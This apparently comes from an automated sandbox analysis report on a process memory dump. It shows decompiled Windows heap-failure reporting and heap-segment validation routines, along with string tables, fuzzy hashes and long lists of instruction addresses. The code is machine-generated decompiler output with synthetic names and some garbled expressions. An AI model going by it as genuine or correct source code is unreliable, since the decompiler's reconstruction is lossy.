Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 745f4b799511ba6e25a1bce887ec3c9abb09af1349214c65c6da9041467a30f7
Instruction ID: 9b84fd83897da557ca14f7405d8489fbba8e0af1855b28cd776482d11e506a3c
Opcode Fuzzy Hash: 745f4b799511ba6e25a1bce887ec3c9abb09af1349214c65c6da9041467a30f7
Instruction Fuzzy Hash: 84810271A40200FFDB21AE8ACC56D7B3F3AFF56A91F00415CF5056F212D3698452CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 01691C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01691C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x16c589c);
				E015DB150("Heap error detected at %p (heap handle %p)\n",  *0x16c58a0);
				_t27 =  *0x16c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01691E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E015DB150("Error code: %d - %s\n",  *0x16c5898);
				_t113 =  *0x16c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter1: %p\n",  *0x16c58a4);
				}
				_t115 =  *0x16c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter2: %p\n",  *0x16c58a8);
				}
				_t117 =  *0x16c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter3: %p\n",  *0x16c58ac);
				}
				_t119 =  *0x16c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16c58b4);
					E015DB150("Last known valid blocks: before - %p, after - %p\n",  *0x16c58b0);
				} else {
					_t120 =  *0x16c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E015DB150("Stack trace available at %p\n", 0x16c58c0);
			}

0x01691c10
0x01691c16
0x01691c1e
0x01691c3d
0x01691c3e
0x01691c20
0x01691c35
0x01691c3a
0x01691c44
0x01691c55
0x01691c5a
0x01691c65
0x01691c67
0x00000000
0x01691c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01691c67
0x01691cdc
0x01691ce5
0x01691d04
0x01691d05
0x01691ce7
0x01691cfc
0x01691d01
0x01691d0b
0x01691d17
0x01691d1f
0x01691d25
0x01691d30
0x01691d4f
0x01691d50
0x01691d32
0x01691d47
0x01691d4c
0x01691d61
0x01691d67
0x01691d68
0x01691d6e
0x01691d79
0x01691d98
0x01691d99
0x01691d7b
0x01691d90
0x01691d95
0x01691daa
0x01691db0
0x01691db1
0x01691db7
0x01691dc2
0x01691de1
0x01691de2
0x01691dc4
0x01691dd9
0x01691dde
0x01691df3
0x01691df9
0x01691dfa
0x01691e00
0x01691e0a
0x01691e13
0x01691e32
0x01691e33
0x01691e15
0x01691e2a
0x01691e2f
0x01691e39
0x01691e4a
0x01691e02
0x01691e02
0x01691e08
0x00000000
0x00000000
0x01691e08
0x01691e5b
0x01691e7a
0x01691e7b
0x01691e5d
0x01691e72
0x01691e77
0x01691e95

Strings

heap_failure_multiple_entries_corruption, xrefs: 01691C8A
heap_failure_buffer_underrun, xrefs: 01691C9F
heap_failure_listentry_corruption, xrefs: 01691CD0
heap_failure_usage_after_free, xrefs: 01691CBB
HEAP: , xrefs: 01691C16, 01691C3D, 01691D04, 01691D4F, 01691D98, 01691DE1, 01691E32, 01691E7A
heap_failure_entry_corruption, xrefs: 01691C83
heap_failure_unknown, xrefs: 01691C75
heap_failure_block_not_busy, xrefs: 01691CA6
Heap error detected at %p (heap handle %p), xrefs: 01691C50
Last known valid blocks: before - %p, after - %p, xrefs: 01691E45
heap_failure_buffer_overrun, xrefs: 01691C98
heap_failure_invalid_argument, xrefs: 01691CAD
HEAP[%wZ]: , xrefs: 01691C30, 01691CF7, 01691D42, 01691D8B, 01691DD4, 01691E25, 01691E6D
heap_failure_virtual_block_corruption, xrefs: 01691C91
Error code: %d - %s, xrefs: 01691D12
heap_failure_invalid_allocation_type, xrefs: 01691CB4
heap_failure_generic, xrefs: 01691C7C
heap_failure_freelists_corruption, xrefs: 01691CC9
Parameter1: %p, xrefs: 01691D5C
Stack trace available at %p, xrefs: 01691E86
heap_failure_lfh_bitmap_mismatch, xrefs: 01691CD7
heap_failure_cross_heap_operation, xrefs: 01691CC2
Parameter2: %p, xrefs: 01691DA5
heap_failure_internal, xrefs: 01691C6E
Parameter3: %p, xrefs: 01691DEE

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 9be169d22a43006dfc8c63990eca867d93a3278a5aafe10dbaa05d392f78ddd0
Instruction ID: 42890cfcf86b7aab08cfe4bfa2519bec9ed78229446bd8dc03edc65ce6544feb
Opcode Fuzzy Hash: 9be169d22a43006dfc8c63990eca867d93a3278a5aafe10dbaa05d392f78ddd0
Instruction Fuzzy Hash: FA61E237651187DFDB21ABD9DC8693577F9FB02D31F2A802EF40A6F300D66899428B09

Uniqueness

Uniqueness Score: -1.00%

Function 01694AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E01694AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E015DB150();
						} else {
							E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E015DB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0168FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E015DB150();
						} else {
							E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E015DB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E015DB150();
									} else {
										E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E015DB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0168FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E015DB150();
										} else {
											E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0162D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0169A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E015FE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0169A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E015FE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E015FA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E015FA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E015FBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E016823E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E015D1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x01694af7
0x01694afb
0x01694afd
0x01694b01
0x01694b03
0x01694b08
0x01694b0a
0x01694b0f
0x01694eb5
0x01694eb5
0x01694ebb
0x016950d5
0x016950d8
0x01694ff6
0x00000000
0x01694ff6
0x016950de
0x016950e4
0x016950e8
0x01695107
0x0169510c
0x016950ea
0x016950ff
0x01695104
0x01695112
0x01695115
0x01695118
0x01695119
0x016950cb
0x016950cb
0x016950af
0x00000000
0x016950af
0x01694ecb
0x016950b6
0x016950bb
0x01694ed1
0x01694ee6
0x01694eeb
0x016950c1
0x016950c2
0x016950c5
0x016950c6
0x00000000
0x00000000
0x00000000
0x00000000
0x01694b15
0x01694b15
0x01694b1c
0x01694b1e
0x01694b23
0x01694b27
0x01694b33
0x01694b38
0x01694b3a
0x01694b3c
0x01694b41
0x01694b41
0x01694b3a
0x01694b52
0x01695045
0x0169504b
0x0169504f
0x0169506e
0x01695073
0x01695051
0x01695066
0x0169506b
0x01695083
0x01695088
0x01695088
0x0169508a
0x01695091
0x01695099
0x01695099
0x0169509d
0x016950a7
0x016950ad
0x016950ad
0x016950ad
0x00000000
0x0169509d
0x01694b58
0x01694b5b
0x01694b5e
0x01694b63
0x01694b66
0x01694b69
0x01694b6f
0x01694be4
0x01694bf0
0x01694bf2
0x01694bf5
0x01694dc3
0x01694dc6
0x01694dc9
0x01694dce
0x01694dce
0x01694dd0
0x01694dd0
0x01694dd5
0x01694def
0x01694dd7
0x01694de7
0x01694de7
0x01694df3
0x01695001
0x01695007
0x0169500b
0x0169502a
0x0169502f
0x0169500d
0x01695022
0x01695027
0x01695039
0x0169503a
0x0169503b
0x00000000
0x01694df9
0x01694dfd
0x01694e90
0x01694e94
0x01694e9e
0x01694ea4
0x01694ea4
0x01694ea4
0x01694ea6
0x01694ea6
0x00000000
0x01694ea6
0x01694e03
0x01694e08
0x01694f88
0x01694f92
0x01694f99
0x01694f9c
0x01694fe0
0x01694fe4
0x01694fee
0x01694ff4
0x01694ff4
0x01694ff4
0x00000000
0x01694fe4
0x01694f9e
0x01694fa4
0x01694fa8
0x01694fc7
0x01694fcc
0x01694faa
0x01694fbf
0x01694fc4
0x01694fd2
0x01694fd5
0x01694fd6
0x01694f34
0x01694f34
0x00000000
0x01694f39
0x01694e0e
0x01694e14
0x01694e1b
0x01694e25
0x01694e2b
0x01694e2b
0x01694e33
0x01694e38
0x01694e8a
0x01694e8a
0x00000000
0x01694e3a
0x01694e3e
0x01694e43
0x01694e47
0x01694e53
0x01694e58
0x01694e5a
0x01694e5c
0x01694e61
0x01694e61
0x01694e5a
0x01694e6e
0x01694f41
0x01694f47
0x01694f4b
0x01694f6a
0x01694f6f
0x01694f4d
0x01694f62
0x01694f67
0x01694f7f
0x01694f80
0x01694f81
0x00000000
0x01694e74
0x01694e78
0x01694e82
0x01694e88
0x01694e88
0x00000000
0x01694e78
0x01694e6e
0x01694e38
0x01694df3
0x01694bfe
0x01694c01
0x01694c04
0x01694c07
0x01694c09
0x01694c0c
0x01694c0e
0x01694c0e
0x01694c11
0x01694c11
0x01694c0c
0x01694c14
0x01694c17
0x01694dae
0x01694db2
0x01694db7
0x01694dba
0x01694dbd
0x01694ef1
0x01694ef7
0x01694efb
0x01694f1a
0x01694f1f
0x01694efd
0x01694f12
0x01694f17
0x01694f2b
0x01694f2b
0x01694f2d
0x01694f2e
0x01694f2f
0x00000000
0x01694f2f
0x00000000
0x01694c1d
0x01694c1d
0x01694c20
0x01694c23
0x01694c26
0x01694c29
0x01694c2c
0x01694c2e
0x01694d91
0x01694d91
0x01694d92
0x01694d97
0x01694d9e
0x00000000
0x01694d9e
0x01694c34
0x01694c37
0x01694c39
0x01694c3c
0x00000000
0x00000000
0x01694c45
0x01694c48
0x01694c4e
0x01694c50
0x01694c78
0x01694c78
0x01694c7b
0x01694c7d
0x01694c80
0x01694c84
0x01694cad
0x01694cad
0x01694cb0
0x01694cb8
0x01694cbb
0x01694cbe
0x01694cc1
0x01694cc7
0x01694cdc
0x01694cc9
0x01694cd2
0x01694cd4
0x01694cd4
0x01694cde
0x01694ce0
0x01694d13
0x01694d13
0x01694d16
0x01694d18
0x01694d29
0x01694d2a
0x01694d2c
0x01694d34
0x01694d1a
0x01694d1a
0x01694d1a
0x01694d1d
0x01694d1f
0x01694d22
0x01694d24
0x01694d24
0x01694d3c
0x01694d3f
0x01694d45
0x01694d47
